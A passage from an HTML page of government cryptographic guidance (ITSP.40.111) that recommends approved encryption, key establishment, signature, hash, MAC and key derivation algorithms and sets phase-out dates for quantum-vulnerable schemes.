require state management but has inferior performance and larger signatures than <abbr title="Module-Lattice-Based Digital Signature Algorithm">ML-DSA</abbr> and the stateful hash-bashed signature schemes.</p> <p>International standards bodies are incorporating these new post-quantum algorithms into network protocols. As new protocol standards become available, the Cyber Centre’s <a href="/en/guidance/guidance-securely-configuring-network-protocols-itsp40062">Guidance on securely configuring network protocols (ITSP.40.062)</a> will be updated to include post-quantum configurations. For more detailed information on how to prepare, read <a href="/en/guidance/preparing-your-organization-quantum-threat-cryptography-itsap00017">Preparing your organization for the quantum threat to cryptography (ITSAP.00.017)</a>.</p> <p>This version of ITSP.40.111 includes new phase-out dates for quantum-vulnerable key establishment schemes and digital signature schemes.</p> <p><strong>Organizations should only use post-quantum public-key encryption and signature schemes that comply with the final, published standards (as referenced in this publication) to protect information or systems.</strong></p> </section><div class="clearfix">Ā </div> <div class="pull-right small text-muted mrgn-bttm-0"><a href="#wb-tphp">Top of page</a> <span aria-hidden="true" class="text-primary glyphicon glyphicon-circle-arrow-up"> </span></div> <section><h2 class="text-info" id="a3">3 Encryption algorithms</h2> <p>The following section outlines the recommended encryption algorithms for protecting the confidentiality of UNCLASSIFIED, PROTECTED A, and PROTECTED B information.</p> <h3 id="a31">3.1 Advanced Encryption Standard algorithm</h3> <p>We recommend the Advanced Encryption Standard (AES) algorithm, as specified in <abbr title="National Institute of Standards and Technology">NIST</abbr> Federal Information Processing Standard (FIPS) <a href="https://csrc.nist.gov/pubs/fips/197/final">197: Advanced Encryption Standard</a>, with key lengths of 128, 192, and 256 bits.</p> </section><div class="clearfix">Ā </div> <div class="pull-right small text-muted mrgn-bttm-0"><a href="#wb-tphp">Top of page</a> <span aria-hidden="true" class="text-primary glyphicon glyphicon-circle-arrow-up"> </span></div> <section><h2 class="text-info" id="a4">4 Encryption algorithm modes of operation</h2> <p>The following section outlines the encryption algorithm modes of operation that we recommend for use with the <abbr title="Advanced Encryption Standard">AES</abbr> algorithm specified in section <a href="#a31">3.1 Advanced Encryption Standard algorithm</a>.</p> <h3 id="a41">4.1 Protecting the confidentiality of information</h3> <p>We recommend the following block cipher modes of operation for protecting the confidentiality of UNCLASSIFIED, PROTECTED A and PROTECTED B information, as specified in <a href="https://csrc.nist.gov/pubs/sp/800/38/a/final"><abbr title="National Institute of Standards and Technology">NIST</abbr> Special Publication (SP) 800-38A: Recommendation for Block Cipher Modes of Operation: Methods and Techniques</a>:</p> <ul><li>Electronic Codebook (ECB) mode is only suitable for situations in which a single block of data is being encrypted, or as specified in derived algorithms such as key wrapping (see section <a href="#b11">11 Key wrap modes of operation</a>). It should not be used for bulk data encryption</li> <li>Cipher Feedback (CFB)</li> <li>Output Feedback (OFB)</li> <li>Counter (CTR)</li> <li>Cipher Block Chaining (CBC) <ul><li>When using <abbr title="Cipher Block Chaining">CBC</abbr> mode with a plaintext input of bit length greater than or equal to the block size, a padding method must be used as described in Appendix A of <abbr title="National Institute of Standards and Technology">NIST</abbr> <abbr title="special publication">SP</abbr> 800-38A. Protocols typically specify particular padding methods that may be used</li> <li>If no padding method is specified, we recommend the following modes from <a href="https://csrc.nist.gov/pubs/sp/800/38/a/sup/final"><abbr title="National Institute of Standards and Technology">NIST</abbr> <abbr title="special publication">SP</abbr> 800-38A Addendum: Recommendation for Block Cipher Modes of Operation: Three Variants of Ciphertext Stealing for <abbr title="Cipher Block Chaining">CBC</abbr> Mode</a> <ul><li>CBC-CS1</li> <li>CBC-CS2</li> <li>CBC-CS3</li> </ul></li> </ul></li> </ul><p><abbr title="National Institute of Standards and Technology">NIST</abbr> <abbr title="special publication">SP</abbr> 800-38A lists several important requirements:</p> <ul><li><abbr title="Cipher Block Chaining">CBC</abbr> and <abbr title="Cipher Feedback">CFB</abbr> modes require unpredictable Initialization Vectors (IVs)</li> <li>For <abbr title="Output Feedback">OFB</abbr> mode, the <abbr title="Initialization Vectors">IV</abbr> must be a nonce that is unique to each execution of the encryption operation. It does not need to be unpredictable</li> <li><abbr title="Counter">CTR</abbr> mode requires a unique counter block for each block of plaintext ever encrypted under a given key, across all messages</li> </ul><p>For protecting data on storage devices, we recommend XTS-<abbr title="Advanced Encryption Standard">AES</abbr> mode as specified in <a href="https://csrc.nist.gov/pubs/sp/800/38/e/final"><abbr title="National Institute of Standards and Technology">NIST</abbr> SP 800-38E: Recommendation for Block Cipher Modes of Operation: The XTS-<abbr title="Advanced Encryption Standard">AES</abbr> Mode for Confidentiality on Storage Devices</a>.</p> <h3 id="a42">4.2 Protecting the confidentiality and authenticity of information</h3> <p>We recommend the following modes of operation for protecting the confidentiality and authenticity of UNCLASSIFIED, PROTECTED A and PROTECTED B information:</p> <ul><li>Counter with Cipher Block Chaining Message Authentication Code (CCM) as specified in <a href="https://csrc.nist.gov/pubs/sp/800/38/c/upd1/final"><abbr title="National Institute of Standards and Technology">NIST</abbr> SP 800ā38C: Recommendation for Block Cipher Modes of Operation: The CCM Mode for Authentication and Confidentiality</a></li> <li>Galois/Counter Mode (GCM) as specified in <a href="https://csrc.nist.gov/pubs/sp/800/38/d/final"><abbr title="National Institute of Standards and Technology">NIST</abbr> SP 800-38D: Recommendation for Block Cipher Modes of Operation: Galois/Counter Mode (GCM) and <abbr title="Galois/Counter Mode Message Authentication Code">GMAC</abbr></a></li> </ul></section><div class="clearfix">Ā </div> <div class="pull-right small text-muted mrgn-bttm-0"><a href="#wb-tphp">Top of page</a> <span aria-hidden="true" class="text-primary glyphicon glyphicon-circle-arrow-up"> </span></div> <section><h2 class="text-info" id="a5">5 Key establishment schemes</h2> <p>A key establishment scheme is a procedure by which multiple participants create or obtain shared secrets, such as cryptographic keys. The following section outlines the key establishment schemes that we recommend for use with cryptographic algorithms for protecting UNCLASSIFIED, PROTECTED A and PROTECTED B information.</p> <h3 id="a51">5.1 Rivest-Shamir-Adleman</h3> <p>We recommend the Rivest-Shamir-Adleman (RSA)-based key-transport and key-agreement schemes, as specified in <a href="https://csrc.nist.gov/pubs/sp/800/56/b/r2/final"><abbr title="National Institute of Standards and Technology">NIST</abbr> SP 800-56B Rev. 2: Recommendation for Pair-Wise Key-Establishment Schemes Using Integer Factorization Cryptography</a>, with an <abbr title="Rivest-Shamir-Adleman">RSA</abbr> modulus length of at least 2048 bits.</p> <p><strong>The <abbr title="Rivest-Shamir-Adleman">RSA</abbr> modulus length should be increased to at least 3072 bits by the end of 2030.</strong></p> <p><strong>The use of <abbr title="Rivest-Shamir-Adleman">RSA</abbr> without a post-quantum key establishment scheme should be phased out by the end of 2035.</strong></p> <h3 id="a52">5.2 Finite Field Cryptography Diffie-Hellman and Menezes-Qu-Vanstone</h3> <p>We recommend the Finite Field Cryptography (FFC) Diffie-Hellman (DH) and <abbr title="Finite Field Cryptography">FFC</abbr> Menezes-Qu-Vanstone (MQV)-based key-agreement schemes with valid domain parameters, as specified in <a href="https://csrc.nist.gov/pubs/sp/800/56/a/r3/final"><abbr title="National Institute of Standards and Technology">NIST</abbr> SP 800-56A Rev. 3: Recommendation for Pair-Wise Key-Establishment Schemes Using Discrete Logarithm Cryptography</a>. The field size (prime modulus parameter) should be at least 2048 bits.</p> <p><strong>The <abbr title="Finite Field Cryptography">FFC</abbr> field size should be increased to at least 3072 bits by the end of 2030.</strong></p> <p><strong>The use of <abbr title="Finite Field Cryptography">FFC</abbr> <abbr title="Diffie-Hellman">DH</abbr> and <abbr title="Finite Field Cryptography">FFC</abbr> <abbr title="Menezes-Qu-Vanstone">MQV</abbr> without a post-quantum key establishment scheme should be phased out by the end of 2035.</strong></p> <h3 id="a53">5.3 Elliptic curve cryptography Cofactor Diffie-Hellman and Menezes-Qu-Vanstone</h3> <p>We recommend the Elliptic Curve Cryptography (ECC) Cofactor Diffie-Hellman (ECC CDH) and <abbr title="Elliptic Curve Cryptography">ECC</abbr> <abbr title="Menezes-Qu-Vanstone">MQV</abbr>-based key-agreement schemes as specified in <a href="https://csrc.nist.gov/pubs/sp/800/56/a/r3/final"><abbr title="National Institute of Standards and Technology">NIST</abbr> SP 800-56A Rev. 3: Recommendation for Pair-Wise Key-Establishment Schemes Using Discrete Logarithm Cryptography</a>. We recommend the following elliptic curves specified in <a href="https://csrc.nist.gov/pubs/sp/800/186/final"><abbr title="National Institute of Standards and Technology">NIST</abbr> SP 800-186: Recommendations for Discrete Logarithm-based Cryptography: Elliptic Curve Domain Parameters</a>:</p> <ul><li>Curve P-224</li> <li>Curve P-256</li> <li>Curve P-384</li> <li>Curve P-521</li> </ul><p><strong>Curve P-224 should be phased out by the end of 2030.</strong> We no longer recommend binary curves specified in <a href="https://csrc.nist.gov/pubs/fips/186-4/final">Appendix D of <abbr title="National Institute of Standards and Technology">NIST</abbr> <abbr title="Federal Information Processing Standards">FIPS</abbr> 186-4: Digital Signature Standard</a>.</p> <p><strong>All binary curves should be phased out by the end of 2030. A list of the curves to be phased out can be found in Section 3.3 of the <a href="https://csrc.nist.gov/pubs/sp/800/186/final"><abbr title="National Institute of Standards and Technology">NIST</abbr> SP 800-186: Recommendations for Discrete Logarithm-based Cryptography: Elliptic Curve Domain Parameters</a></strong>.</p> <p><strong>The use of <abbr title="Elliptic Curve Cryptography">ECC</abbr> <abbr title="Cofactor Diffie-Hellman">CDH</abbr> and <abbr title="Elliptic Curve Cryptography">ECC</abbr> <abbr title="Menezes-Qu-Vanstone">MQV</abbr> without a post-quantum key establishment scheme should be phased out by the end of 2035.</strong></p> <h3 id="a54">5.4 Module-Lattice-Based Key-Encapsulation Mechanism</h3> <p>We recommend the Module-Lattice-Based Key-Encapsulation Mechanism (ML-KEM) as a general-purpose, post-quantum key establishment scheme, as specified in <a href="https://csrc.nist.gov/pubs/fips/203/final"><abbr title="National Institute of Standards and Technology">NIST</abbr> <abbr title="Federal Information Processing Standards">FIPS</abbr> 203: Module-Lattice-Based Key-Encapsulation Mechanism Standard</a>, with the following parameters:</p> <ul><li>ML-KEM-512</li> <li>ML-KEM-768</li> <li>ML-KEM-1024</li> </ul></section><div class="clearfix">Ā </div> <div class="pull-right small text-muted mrgn-bttm-0"><a href="#wb-tphp">Top of page</a> <span aria-hidden="true" class="text-primary glyphicon glyphicon-circle-arrow-up"> </span></div> <section><h2 class="text-info" id="a6">6 Digital signature schemes</h2> <p>The following section outlines the algorithms that we recommend for digital signature applications providing data integrity and data origin authentication of UNCLASSIFIED, PROTECTED A and PROTECTED B information. We also specify a digital signature scheme that was recommended in a previous version of this publication but should be phased out by the end of 2030.</p> <h3 id="a61">6.1 Rivest-Shamir-Adleman</h3> <p>We recommend the Rivest-Shamir-Adleman (RSA) digital signature algorithm, using RSASSA-PKCS1-v1.5 or RSASSA-PSS, as specified in <a href="https://csrc.nist.gov/pubs/fips/186-5/final"><abbr title="National Institute of Standards and Technology">NIST</abbr> <abbr title="Federal Information Processing Standards">FIPS</abbr> 186-5: Digital Signature Standard</a> with an <abbr title="Rivest-Shamir-Adleman">RSA</abbr> modulus length of at least 2048 bits.</p> <p><strong>The <abbr title="Rivest-Shamir-Adleman">RSA</abbr> modulus length should be increased to at least 3072 bits by the end of 2030.</strong></p> <p><strong>The use of <abbr title="Rivest-Shamir-Adleman">RSA</abbr> without a post-quantum digital signature scheme should be phased out by the end of 2035.</strong></p> <h3 id="a62">6.2 Digital Signature Algorithm</h3> <p><strong>The use of Digital Signature Algorithm (DSA) should be phased out by the end of 2030.</strong></p> <p>We no longer recommend the <abbr title="Digital Signature Algorithm">DSA</abbr> as specified in <a href="https://csrc.nist.gov/pubs/fips/186-4/final"><abbr title="National Institute of Standards and Technology">NIST</abbr> <abbr title="Federal Information Processing Standards">FIPS</abbr> 186-4: Digital Signature Standard</a> for new applications. Existing applications must use valid domain parameters for a field size (prime modulus parameter) of at least 2048 bits.</p> <h3 id="a63">6.3 Elliptic Curve Digital Signature Algorithm</h3> <p>We recommend the Elliptic Curve Digital Signature Algorithm (ECDSA) and deterministic <abbr title="Elliptic Curve Digital Signature Algorithm">ECDSA</abbr><sup id="fn1-rf"><a class="fn-lnk" href="#fn1"><span class="wb-inv">Footnote </span>1</a></sup> as specified in <a href="https://csrc.nist.gov/pubs/fips/186-5/final"><abbr title="National Institute of Standards and Technology">NIST</abbr> <abbr title="Federal Information Processing Standards">FIPS</abbr> 186-5: Digital Signature Standard</a>. We recommend the following elliptic curves specified in <a href="https://csrc.nist.gov/pubs/sp/800/186/final"><abbr title="National Institute of Standards and Technology">NIST</abbr> SP 800-186: Recommendations for Discrete Logarithm-based Cryptography: Elliptic Curve Domain Parameters</a>:</p> <ul><li>Curve P-224</li> <li>Curve P-256</li> <li>Curve P-384</li> <li>Curve P-521</li> </ul><p><strong>Curve P-224 should be phased out by the end of 2030.</strong></p> <p>We no longer recommend binary curves specified in Appendix D of <a href="https://csrc.nist.gov/pubs/fips/186-4/final"><abbr title="National Institute of Standards and Technology">NIST</abbr> <abbr title="Federal Information Processing Standards">FIPS</abbr> 186-4: Digital Signature Standard</a>.</p> <p><strong>All binary curves should be phased out by the end of 2030.</strong> A list of the curves to be phased out can be found in section 3.3 of <a href="https://csrc.nist.gov/pubs/sp/800/186/final"><abbr title="National Institute of Standards and Technology">NIST</abbr> SP 800-186: Recommendations for Discrete Logarithm-based Cryptography: Elliptic Curve Domain Parameters</a>.</p> <p><strong>The use of <abbr title="Elliptic Curve Digital Signature Algorithm">ECDSA</abbr> without a post-quantum digital signature scheme should be phased out by the end of 2035.</strong></p> <h3 id="a64">6.4 Edwards-Curve Digital Signature Algorithm</h3> <p>We recommend the Edwards-Curve Digital Signature Algorithm (EdDSA) as specified in <a href="https://csrc.nist.gov/pubs/fips/186-5/final"><abbr title="National Institute of Standards and Technology">NIST</abbr> <abbr title="Federal Information Processing Standards">FIPS</abbr> 186-5: Digital Signature Standard</a> with the following elliptic curves specified in <a href="https://csrc.nist.gov/pubs/sp/800/186/final"><abbr title="National Institute of Standards and Technology">NIST</abbr> SP 800-186: Recommendations for Discrete Logarithm-based Cryptography: Elliptic Curve Domain Parameters</a>:</p> <ul><li>Edwards25519</li> <li>Edwards448</li> </ul><p>We do not recommend the prehash version Hash<abbr title="Edwards-Curve Digital Signature Algorithm">EdDSA</abbr>.</p> <p><strong>The use of <abbr title="Edwards-Curve Digital Signature Algorithm">EdDSA</abbr> without a post-quantum digital signature scheme should be phased out by the end of 2035.</strong></p> <h3 id="a65">6.5 Module-Lattice-Based Digital Signature Algorithm</h3> <p>We recommend the Module-Lattice-Based Digital Signature scheme Algorithm (ML-DSA) as a general-purpose, post-quantum digital signature scheme as specified in <a href="https://csrc.nist.gov/pubs/fips/204/final"><abbr title="National Institute of Standards and Technology">NIST</abbr> <abbr title="Federal Information Processing Standards">FIPS</abbr> 204: Module-Lattice-Based Digital Signature Standard</a> with the following parameters:</p> <ul><li>ML-DSA-44</li> <li>ML-DSA-65</li> <li>ML-DSA-87</li> </ul><h3 id="a66">6.6 Stateless Hash-Based Digital Signature Algorithm</h3> <p>We recommend the Stateless Hash-Based Digital Signature Algorithm (SLH-DSA) as a post-quantum digital signature scheme as specified in <a href="https://csrc.nist.gov/pubs/fips/205/final"><abbr title="National Institute of Standards and Technology">NIST</abbr> <abbr title="Federal Information Processing Standards">FIPS</abbr> 205: Stateless Hash-Based Digital Signature Standard</a> with the following parameters:</p> <ul><li>SLH-DSA-SHA2-128s</li> <li>SLH-DSA-SHAKE-128s</li> <li>SLH-DSA-SHA2-128f</li> <li>SLH-DSA-SHAKE-128f</li> <li>SLH-DSA-SHA2-192s</li> <li>SLH-DSA-SHAKE-192s</li> <li>SLH-DSA-SHA2-192f</li> <li>SLH-DSA-SHAKE-192f</li> <li>SLH-DSA-SHA2-256s</li> <li>SLH-DSA-SHAKE-256s</li> <li>SLH-DSA-SHA2-256f</li> <li>SLH-DSA-SHAKE-256f</li> </ul><h3 id="a67">6.7 Stateful hash-based signature schemes</h3> <p>Stateful hash-based signature schemes are another family of post-quantum digital signature schemes. Implementations of signature generation for stateful hash-based signature schemes must carefully manage an internal state. This is an additional complexity in comparison to other types of digital signature schemes. Mismanagement of the internal state can result in a complete loss of security. Previously, we recommended stateful hash-based signatures when certain conditions applied, including when a post-quantum signature scheme must be implemented before general-purpose, post-quantum signature schemes were standardized. Although stateful hash-based signature schemes can still be used, the newly standardized post-quantum digital signature schemes <abbr title="Module-Lattice-Based Digital Signature Algorithm">ML-DSA</abbr> and <abbr title="Stateless Hash-Based Digital Signature Algorithm">SLH-DSA</abbr> do not require state management (sections <a href="#a65">6.5 Module-Lattice-Based Digital Signature Algorithm</a> and <a href="#a66">6.6 Stateless Hash-Based Digital Signature Algorithm</a>) and can be used in most situations where a digital signature scheme is needed. Stateful hash-based signatures should only be used when the signer is not required to rapidly produce signatures and is able to protect and manage private key state.</p> <p>If you are using stateful hash-based signatures, we recommend the following post-quantum digital signature schemes, as specified in <a href="https://csrc.nist.gov/pubs/sp/800/208/final"><abbr title="National Institute of Standards and Technology">NIST</abbr> SP 800-208: Recommendation for Stateful Hash-based Signatures Scheme</a>, using one of the hash functions <abbr title="Secure Hash Algorithm">SHA</abbr>-256, <abbr title="Secure Hash Algorithm">SHA</abbr>-256/192, SHAKE256/256, or SHAKE256/192 specified in section 2.3 of <a href="https://csrc.nist.gov/pubs/sp/800/208/final"><abbr title="National Institute of Standards and Technology">NIST</abbr> SP 800-208: Recommendation for Stateful Hash-Based Signature Schemes</a>.</p> <ul><li>Leighton-Micali Signature (LMS)</li> <li>Hierarchical Signature System (HSS)</li> <li>eXtended Merkle Signature Scheme (XMSS)</li> <li>Multi-tree eXtended Merkle Signature Scheme (XMSS<sup>MT</sup>)</li> </ul></section><div class="clearfix">Ā </div> <div class="pull-right small text-muted mrgn-bttm-0"><a href="#wb-tphp">Top of page</a> <span aria-hidden="true" class="text-primary glyphicon glyphicon-circle-arrow-up"> </span></div> <section><h2 class="text-info" id="a7">7 Hash functions</h2> <p>A hash function is a procedure to transform a message of arbitrary length into an output, called a "digest", of fixed length. A secure (cryptographic) hash function should satisfy additional properties, such as "collision resistance", whereby it is infeasible to find distinct messages with the same digest. The following section outlines the recommended hash functions for use with the cryptographic algorithms specified in this publication for protecting UNCLASSIFIED, PROTECTED A and PROTECTED B information.</p> <h3 id="a71">7.1 Secure Hash Algorithm-1</h3> <p>We no longer recommend the use of Secure Hash Algorithm-1 (SHA-1), as specified in <a href="https://csrc.nist.gov/pubs/fips/180-4/upd1/final"><abbr title="National Institute of Standards and Technology">NIST</abbr> <abbr title="Federal Information Processing Standards">FIPS</abbr> 180-4: Secure Hash Standard</a>, which was previously approved for use with keyed-hash message authentication codes, key derivation functions (KDFs) and random bit generators (RBGs).</p> <p><strong><abbr title="Secure Hash Algorithm">SHA</abbr>-1 must not be used with digital signature schemes or with any applications that require collision resistance. <abbr title="Secure Hash Algorithm">SHA</abbr>-1 should be phased out for use in keyed-hash message authentication codes, <abbr title="key derivation functions">KDFs</abbr>, and <abbr title="random bit generators">RBGs</abbr>.</strong></p> <h3 id="a72">7.2 Secure Hash Algorithm-2</h3> <p>We recommend <abbr title="Secure Hash Algorithm">SHA</abbr>-224, <abbr title="Secure Hash Algorithm">SHA</abbr>-256, <abbr title="Secure Hash Algorithm">SHA</abbr>-384, <abbr title="Secure Hash Algorithm">SHA</abbr>-512, <abbr title="Secure Hash Algorithm">SHA</abbr>-512/224, and <abbr title="Secure Hash Algorithm">SHA</abbr>-512/256, as specified in <a href="https://csrc.nist.gov/pubs/fips/180-4/upd1/final"><abbr title="National Institute of Standards and Technology">NIST</abbr> <abbr title="Federal Information Processing Standards">FIPS</abbr> 180-4: Secure Hash Standard</a>, for use with digital signature schemes, keyed-hash message authentication codes, <abbr title="key derivation functions">KDFs</abbr> and <abbr title="random bit generators">RBGs</abbr>. The truncated hash function <abbr title="Secure Hash Algorithm">SHA</abbr>-256/192 specified in <a href="https://csrc.nist.gov/pubs/sp/800/208/final"><abbr title="National Institute of Standards and Technology">NIST</abbr> SP 800-208: Recommendation for Stateful Hash-Based Signature Schemes</a> is only recommended for use with the stateful hash-based signature schemes listed in section <a href="#a67">6.7 Stateful hash-based signature schemes</a>.</p> <p><strong><abbr title="Secure Hash Algorithm">SHA</abbr>-224 should be phased out by the end of 2030.</strong></p> <h3 id="a73">7.3 Secure Hash Alogorithm-3</h3> <p>We recommend <abbr title="Secure Hash Algorithm">SHA</abbr>3-224, <abbr title="Secure Hash Algorithm">SHA</abbr>3-256, <abbr title="Secure Hash Algorithm">SHA</abbr>3-384, and <abbr title="Secure Hash Algorithm">SHA</abbr>3-512, as specified in <a href="https://csrc.nist.gov/pubs/fips/202/final"><abbr title="National Institute of Standards and Technology">NIST</abbr> <abbr title="Federal Information Processing Standards">FIPS</abbr> 202: <abbr title="Secure Hash Algorithm">SHA</abbr>-3 Standard: Permutation-Based Hash and Extendable-Output Functions</a>, for use with digital signature schemes, keyed-hash message authentication codes, <abbr title="key derivation functions">KDFs</abbr> and <abbr title="random bit generators">RBGs</abbr>.</p> <p><strong><abbr title="Secure Hash Algorithm">SHA</abbr>3-224 should be phased out by the end of 2030.</strong></p> <div class="clearfix">Ā </div> <div class="pull-right small text-muted mrgn-bttm-0"><a href="#wb-tphp">Top of page</a> <span aria-hidden="true" class="text-primary glyphicon glyphicon-circle-arrow-up"> </span></div> </section><section><h2 class="text-info" id="a8">8 Extendable output functions</h2> <p>An extendable-output function (XOF) is a procedure to transform a message of arbitrary length into an output that can be extended to any desired length. A secure <abbr title="extendable-output function">XOF</abbr> should satisfy additional properties, such as "collision resistance", whereby it is infeasible to find distinct messages with the same output. The following section outlines 2 <abbr title="extendable-output functions">XOFs</abbr> that we recommend for use with select cryptographic algorithms specified in this publication for protecting UNCLASSIFIED, PROTECTED A and PROTECTED B information.</p> <h3 id="a81">8.1 SHAKE</h3> <p>We recommend SHAKE128, as specified in <a href="https://csrc.nist.gov/pubs/fips/202/final"><abbr title="National Institute of Standards and Technology">NIST</abbr> <abbr title="Federal Information Processing Standards">FIPS</abbr> 202: <abbr title="Secure Hash Algorithm">SHA</abbr>-3 Standard: Permutation Based Hash and Extendable-Output Functions</a>, for use in the following:</p> <ul><li><abbr title="Module-Lattice-Based Key-Encapsulation Mechanism">ML-KEM</abbr> (section <a href="#a54">5.4 Module-Lattice-Based Key-Encapsulation Mechanism</a>)</li> <li>The digital signature schemes <ul><li><abbr title="Rivest-Shamir-Adleman">RSA</abbr> (section <a href="#a61">6.1 Rivest-Shamir-Adelman</a>)</li> <li><abbr title="Elliptic Curve Digital Signature Algorithm">ECDSA</abbr> (section <a href="#a63">6.3 Elliptic Curve Digital Signature Algorithm</a>)</li> <li><abbr title="Module-Lattice-Based Digital Signature Algorithm">ML-DSA</abbr> (section <a href="#a65">6.5 Module-Lattice-Based Digital Signature Algorithm</a>)</li> </ul></li> <li>KECCAK Message Authentication Code (KMAC) (section <a href="#a94">9.4 KECCAK Message Authentication Code</a>)</li> </ul><p>We recommend SHAKE256, as specified in <a href="https://csrc.nist.gov/pubs/fips/202/final"><abbr title="National Institute of Standards and Technology">NIST</abbr> <abbr title="Federal Information Processing Standards">FIPS</abbr> 202: <abbr title="Secure Hash Algorithm">SHA</abbr>-3 Standard: Permutation Based Hash and Extendable-Output Functions</a>, for use in the following:</p> <ul><li><abbr title="Module-Lattice-Based Key-Encapsulation Mechanism">ML-KEM</abbr> (section <a href="#a54">5.4 Module-Lattice-Based Key-Encapsulation Mechanism</a>)</li> <li>The digital signature schemes <ul><li><abbr title="Rivest-Shamir-Adleman">RSA</abbr> (section <a href="#a61">6.1 Rivest-Shamir-Adelman</a>)</li> <li><abbr title="Elliptic Curve Digital Signature Algorithm">ECDSA</abbr> (section <a href="#a63">6.3 Elliptic Curve Digital Signature Algorithm</a>)</li> <li><abbr title="Edwards-Curve Digital Signature Algorithm">EdDSA</abbr> (section <a href="#a64">6.4 Edwards-Curve Digital Signature Algorithm</a>) with curve Edwards448</li> <li><abbr title="Module-Lattice-Based Digital Signature Algorithm">ML-DSA</abbr> (section <a href="#a65">6.5 Module-Lattice-Based Digital Signature Algorithm</a>)</li> <li><abbr title="Stateless Hash-Based Digital Signature Algorithm">SLH-DSA</abbr> (section <a href="#a66">6.6 Stateless Hash-Based Digital Signature Algorithm</a>)</li> <li>Stateful hash-based digital signature schemes (section <a href="#a67">6.7 Stateful hash-based signature schemes</a>)</li> </ul></li> <li><abbr title="KECCAK Message Authentication Code">KMAC</abbr> (section <a href="#a94">9.4 KECCAK Message Authentication Code</a>)</li> </ul><div class="clearfix">Ā </div> <div class="pull-right small text-muted mrgn-bttm-0"><a href="#wb-tphp">Top of page</a> <span aria-hidden="true" class="text-primary glyphicon glyphicon-circle-arrow-up"> </span></div> </section><section><h2 class="text-info" id="a9">9 Message authentication codes</h2> <p>A message authentication code (MAC) is a fixed-length tag used to verify the authenticity and integrity of a message. The following sections outline the <abbr title="Message Authentication Code">MAC</abbr> algorithms that we recommend for data integrity and data origin authentication of UNCLASSIFIED, PROTECTED A and PROTECTED B information.</p> <h3 id="a91">9.1 Keyed-Hash Message Authentication Code</h3> <p>We recommend Keyed-Hash Message Authentication Code (HMAC), as specified in <a href="https://csrc.nist.gov/pubs/fips/198-1/final"><abbr title="National Institute of Standards and Technology">NIST</abbr> <abbr title="Federal Information Processing Standards">FIPS</abbr> 198-1: The Keyed-Hash Message Authentication Code</a>, with a key length of at least 112 bits.</p> <p><strong>The key length should be increased to at least 128 bits by the end of 2030.</strong></p> <h3 id="a92">9.2 Cipher-based Message Authentication Code</h3> <p>We recommend Cipher-based Message Authentication Code (CMAC), as specified in <a href="https://csrc.nist.gov/pubs/sp/800/38/b/upd1/final"><abbr title="National Institute of Standards and Technology">NIST</abbr> SP 800-38B: Recommendation for Block Cipher Modes of Operation: The <abbr title="Cipher-based Message Authentication Code">CMAC</abbr> Mode for Authentication</a>. <abbr title="Cipher-based Message Authentication Code">CMAC</abbr> is only recommended for use with the <abbr title="Advanced Encryption Standard">AES</abbr> algorithm as specified in section <a href="#a31">3.1 Advanced Encryption Standard algorithm</a>.</p> <h3 id="a93">9.3 Galois/Counter Mode Message Authentication Code</h3> <p>We recommend Galois/Counter ModeĀ Message Authentication Code (GMAC), as specified in <a href="https://csrc.nist.gov/pubs/sp/800/38/d/final"><abbr title="National Institute of Standards and Technology">NIST</abbr> SP 800-38D: Recommendation for Block Cipher Modes of Operation: Galois/Counter Mode (GCM) and <abbr title="Galois/Counter Mode Message Authentication Code">GMAC</abbr></a>. <abbr title="Galois/Counter Mode Message Authentication Code">GMAC</abbr> is only recommended for use with the <abbr title="Advanced Encryption Standard">AES</abbr> algorithm as specified in section <a href="#a31">3.1 Advanced Encryption Standard algorithm</a>.</p> <h3 id="a94">9.4 KECCAK Message Authentication Code</h3> <p>We recommendĀ KECCAK message authentication code (KMAC)128 and <abbr title="KECCAK Message Authentication Code">KMAC</abbr>256 as specified in <a href="https://csrc.nist.gov/pubs/sp/800/185/final"><abbr title="National Institute of Standards and Technology">NIST</abbr> SP 800-185: <abbr title="Secure Hash Algorithm">SHA</abbr>3-Derived Functions: cSHAKE, <abbr title="KECCAK Message Authentication Code">KMAC</abbr>, TupleHash and ParallelHash</a> with a key length of at least 112 bits.</p> <p><strong>The key length should be increased to at least 128 bits by the end of 2030.</strong></p> </section><div class="clearfix">Ā </div> <div class="pull-right small text-muted mrgn-bttm-0"><a href="#wb-tphp">Top of page</a> <span aria-hidden="true" class="text-primary glyphicon glyphicon-circle-arrow-up"> </span></div> <section><h2 class="text-info" id="a10">10 Key derivation functions</h2> <p>A <abbr title="Key Derivation Function">KDF</abbr> is a transformation of secret (as well as possibly non-secret) data into a cryptographically strong secret key. The following sections outline the <abbr title="Key Derivation Functions">KDFs</abbr> that we recommend for the derivation of cryptographic keys from key establishment or pre-shared secrets, used for protecting UNCLASSIFIED, PROTECTED A and PROTECTED B information.</p> <h3 id="a101">10.1 One-Step Key Derivation Function</h3> <p>We recommend the one-step <abbr title="Key Derivation Function">KDF</abbr>, as specified in <a href="https://csrc.nist.gov/pubs/sp/800/56/c/r2/final"><abbr title="National Institute of Standards and Technology">NIST</abbr> SP 800-56C Rev. 2: Recommendation for Key-Derivation Methods in Key-Establishment Schemes</a>.</p> <h3 id="a102">10.2 Two-Step Key Derivation Function</h3> <p>We recommend the two-step, extraction-then-expansion, key derivation procedure, as specified in <a href="https://csrc.nist.gov/pubs/sp/800/56/c/r2/final"><abbr title="National Institute of Standards and Technology">NIST</abbr> SP 800-56C Rev. 2: Recommendation for Key-Derivation Methods in Key-Establishment Schemes</a>. Note that the <abbr title="Hash Message Authentication Code">HMAC</abbr>-based extract-and-expand Key Derivation Function (HKDF) function used in the Transport Layer Security (TLS) version 1.3 protocol follows this specification.</p> <h3 id="a103">10.3 Key derivation using pseudorandom functions</h3> <p>We recommend the <abbr title="Key Derivation Functions">KDFs</abbr> using pseudorandom functions as specified in <a href="https://csrc.nist.gov/pubs/sp/800/108/r1/upd1/final"><abbr title="National Institute of Standards and Technology">NIST</abbr> SP 800-108 Rev. 1: Recommendation for Key Derivation Using Pseudorandom Functions</a>.</p> <h3 id="a104">10.4 Internet Key Exchange version 2 Key Derivation Function</h3> <p>When used in the context of the Internet Key Exchange version 2 (IKEv2) protocol, we recommend the <abbr title="Internet Key Exchange version 2">IKEv2</abbr> <abbr title="Key Derivation Function">KDF</abbr>, as specified in <a href="https://csrc.nist.gov/pubs/sp/800/135/r1/final"><abbr title="National Institute of Standards and Technology">NIST</abbr> SP 800-135 Rev. 1: Recommendation for Existing Application-Specific Key Derivation Functions</a>.</p> <h3 id="a105">10.5 Transport Layer Security version 1.2 Key Derivation Function</h3> <p>When used in the context of the <abbr title="Transport Layer Security">TLS</abbr> version 1.2 protocol, we recommend the <abbr title="Transport Layer Security">TLS</abbr> 1.2 <abbr title="Key 